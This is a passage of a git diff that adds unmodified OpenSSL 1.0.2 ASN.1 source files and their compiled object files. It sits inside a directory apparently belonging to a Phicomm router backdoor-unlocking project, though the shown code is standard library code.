+IMPLEMENT_ASN1_SET_OF(X509_REVOKED)
+
+IMPLEMENT_STACK_OF(X509_CRL)
+
+IMPLEMENT_ASN1_SET_OF(X509_CRL)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_crl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_crl.o
new file mode 100644
index 0000000000000000000000000000000000000000..b92014c0238a7695494d2937554497e33dabfd14
GIT binary patch
literal 12992
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
LhC5R3od5p@Y6Pzl

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_exten.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_exten.c
new file mode 100644
index 0000000..00a9580
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_exten.c
@@ -0,0 +1,77 @@
+/* x_exten.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+
+ASN1_SEQUENCE(X509_EXTENSION) = {
+        ASN1_SIMPLE(X509_EXTENSION, object, ASN1_OBJECT),
+        ASN1_OPT(X509_EXTENSION, critical, ASN1_BOOLEAN),
+        ASN1_SIMPLE(X509_EXTENSION, value, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(X509_EXTENSION)
+
+ASN1_ITEM_TEMPLATE(X509_EXTENSIONS) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, Extension, X509_EXTENSION)
+ASN1_ITEM_TEMPLATE_END(X509_EXTENSIONS)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_EXTENSION)
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(X509_EXTENSIONS, X509_EXTENSIONS, X509_EXTENSIONS)
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_EXTENSION)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_exten.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_exten.o
new file mode 100644
index 0000000000000000000000000000000000000000..95ce0399cbc0121162c6b8ac2c9bbd5d4f1bafa6
GIT binary patch
literal 4072
zcmbuB&u<%55XYbELJO2ODIfxcvH}TOL09Y0s14%BCdP4!EIW!_)rZ2ycDC5XKZ3oc
zE(fT9LpfB+0T2>Lgw!Jv65^Nxe+2&l;)u8)s9NT`J7d2*?<N99TF=bq&CGlIetAF6
z6;=+UQc5JHURM)Os8Y>`Cbk=zt~#z})gQ-B{<V7RVUXYO6ZwxB{%eN6VEFswe|~rM
z)}%yr!CCZj)k>~dzECQbRc;jc-9f9@Rl8eMuYT2U1gg<*1+7M{tv;x=hdz3ak$WsL
zO?#q)d$#W1D04kygr*ID&hY=OEB#2`VKMg6=D5b;`E2$T>(s^iup11mMf+vjIg>dz
z4BgB}^N#JDJssgF1M`Gh_tBFtUQ`E^+5waIe3WcR>ce%F8qK6m965A&n+A=Xr^1%V
zh6(1xus35^HHNig*bReWJYO(-g!Ntu^LtSJelIR29ebki?(+7#v(i*4PSWA*O}C`g
z{ZkOfHAURzmQ$>s3;AUAN6ewpYQi;4Ts!<)Ls}ityos4s;d!0_w$kdsDYi)DxHdmn
zTS$SPSsMQhI3(vIrQRVeF^obLB=Ap&qrT*b{xTu{TaLF#LnQu3%?=y*=V#KW@31fN
zzmP9BH-+j~`bE6UP-6ZjAMYz7?|YOs7UI{8_-C1KFqb{Lz-LD4h|VVP^#oo|;A-Ug
zxNq%-aod)?R^WHMATYQ$@ZSgBoNsx?{k+?yeC6c}rRAl9S6W#q=PF)hX}OT|)Ka;a
ziK<f()tcWl3rzy3(d@tLU(+hUGy1*K_kArQbf-sKHq!9EF=H{qyv^a3R($N0mfy-{
zE2t3;ez{aC<d%wKzm%=e`<E;07m9g6b%+;|?oD-!o;&=1^>_k*A%UMu;CYQdLAKPt
zl)$fQTpy3z2)My!wK{T#gJZ8s{g=pwfa9w{_^W^<;CM&jxECO1{mT&!xn94gag0Ig
z$ho6!9-cav;~duD_^%SFvLRgZH#ClU5ZPt}@ec?j{k_If|4H`e41St@OXE+o4dt>e
z<B@T%YWyVIP)&`aU);Nptw_-gqtr8OLs@KNzu^%%%ZBh7_N8Cp7IRq_;WAF?SGddZ
zpRpFc#{Sm^-(X+agX^83Rwo_wBi$6M@3(7qK-ZPBH)}yn+4aFd+5H|IglFswxd;jg
zS=4B^d-ztI;>vFHIvu}D#k#$~x9KD1%pj;W-edpW?$F-q_qP0gaGkULrgx=Z>-aL%
z|D!ER#u`ojA);z-q||`5D8%Y=f*hO~SBGTZ=8I*G6R?M2%9nub%jcP!Uo1Zmj}x<h
zoO9ItulX6uMa_A7bdmnw&>`8<zvvt@vwsQv$;h`1-z7h8{{G~N+U9u7AJ)j6zqg5D
zEN1^ZJirmP>0;>)*;RVt`oGDSi{3x_Hv7kYjjkMebUBZMM)G2$#=kOeqOrfk9tV-p
z;C!9IHe){}hOK6XHyK#eri+YU*f(ULrkQ_}!EFg-ZRUSPJZ}Ex_>)xfv3~e^m3-O%
uaebpJM;4Uz46&mz`B)|iC37qeALwhwgc)x5UmBOc!{h&MTro1t{C@yj^PKJg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_info.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_info.c
new file mode 100644
index 0000000..067fd72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_info.c
@@ -0,0 +1,117 @@
+/* crypto/asn1/x_info.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+
+X509_INFO *X509_INFO_new(void)
+{
+    X509_INFO *ret = NULL;
+
+    ret = (X509_INFO *)OPENSSL_malloc(sizeof(X509_INFO));
+    if (ret == NULL) {
+        ASN1err(ASN1_F_X509_INFO_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    ret->enc_cipher.cipher = NULL;
+    ret->enc_len = 0;
+    ret->enc_data = NULL;
+
+    ret->references = 1;
+    ret->x509 = NULL;
+    ret->crl = NULL;
+    ret->x_pkey = NULL;
+    return (ret);
+}
+
+void X509_INFO_free(X509_INFO *x)
+{
+    int i;
+
+    if (x == NULL)
+        return;
+
+    i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_X509_INFO);
+#ifdef REF_PRINT
+    REF_PRINT("X509_INFO", x);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "X509_INFO_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if (x->x509 != NULL)
+        X509_free(x->x509);
+    if (x->crl != NULL)
+        X509_CRL_free(x->crl);
+    if (x->x_pkey != NULL)
+        X509_PKEY_free(x->x_pkey);
+    if (x->enc_data != NULL)
+        OPENSSL_free(x->enc_data);
+    OPENSSL_free(x);
+}
+
+IMPLEMENT_STACK_OF(X509_INFO)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_info.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_info.o
new file mode 100644
index 0000000000000000000000000000000000000000..6ead5f661ee50d22a3cea1aa3d2b33125a9d9bb6
GIT binary patch
literal 2472
zcmbuA-%Auh9Kh%9G%tUgmla4>+=GQtE_ePQ4U#>t)3pvyE(LwCWz{t$@6Pu2=qyZ7
zlthGHdXC<zzaR`!Fce>U?X{P{DEdJJ5ykcW&d!|Uy7y9F*!j-)^ZhZiGqbaE(O8$;
z<sw{Mq=W2PoD$M-Xs<8Ru1tKSihQp={YzQ+RJ#@hxUN8>thS<m7aL`9BYP$q+6e8e
zg~5FF9GdkibSz(~_gWz<(EHe`Y|FL4$+jFs1!kLN$~YTk8x5phru|eeysq7(Gg!=<
zlLHHH^2+j`@QYy#U7eGaRUC?}l|VzsTHKfmD=V`wt-M*vMxXWWv;6z4Ho;o{GW-F{
z4R3Dd)XCI%S{fy!I}*7RXc!pDrp#=hU22wsjiHNKYKHDN1*KriISXSZ3eE-RUJ6fl
z?*MTVvVqJ456Ur15!c-WapnB3y2>)|Ls$ajCz)>^wc-o7XMEmz=(aGPL4DQdUvj&(
z@-3e?S`qen!&}VjtZ;Qp$hW+c*W-8+aISo|`?Eas?e;UYJoIgyc-cWn<LNFR@OjAL
z1FW19T+M^xA;O_$?rP9A!h6xR1a=A@dZt($SItE@9%rZcIB=}b>(V^|cB4pqstC^&
z;Y&sMqavIX&Z-oP1j%4)uwCux?TV`@{SHyPWAV;#OpSMSU61yw{o&47R3(wbP+xys
zO=?q9=}{6*B-H7wsp^K2HiZ0fL)UqzHa4b0>@CYpJ#?T*BBt(Heb=HxmdQq-E|@pU
zaZBO%KzI3f-jWlH<2Qm|Gv}8D?i2W9#_e^U3GujZyv|F39})PDz-t8lR^Uek{$Akt
zt@8Sxi|_#BI8S`I&|41-&gZ#9%FHB9ZG=b})3Ede?-}}(CYgH9B+{5>YD5~zWQb&>
z(ZKMK6e7}SI+@f{5Ryupx&&8GW5(2A%Pjk5Dl1JJ>1o|CXCM^|>JzY8T2ki|_&*(h
zbi8ZqU!)8S<%gvTEyjvc2L_%2S%lDkfDq)XrAP&6%;h%-{i%R`mT~*d)oLFI;!y1P
z0x+!kulXTXvk9~)e0=-O#>eMch9v9<#boGruz>S6&hxnL0YC4Hp_5L~A$ABD-qzw-
z#X8e0KY)fHeEm7P4IK=%=i|Q(WzbTE)}B8F9;f}!v8$i23+_LzCC}&k?=&_Jw#&x<
p$#f+!tYOc`n)ba1MBXv@1Pwu0xdOqv#VP+OoBzE+q}8$K{{{7?E93wG

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_long.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_long.c
new file mode 100644
index 0000000..f393619
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_long.c
@@ -0,0 +1,183 @@
+/* x_long.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/bn.h>
+
+/*
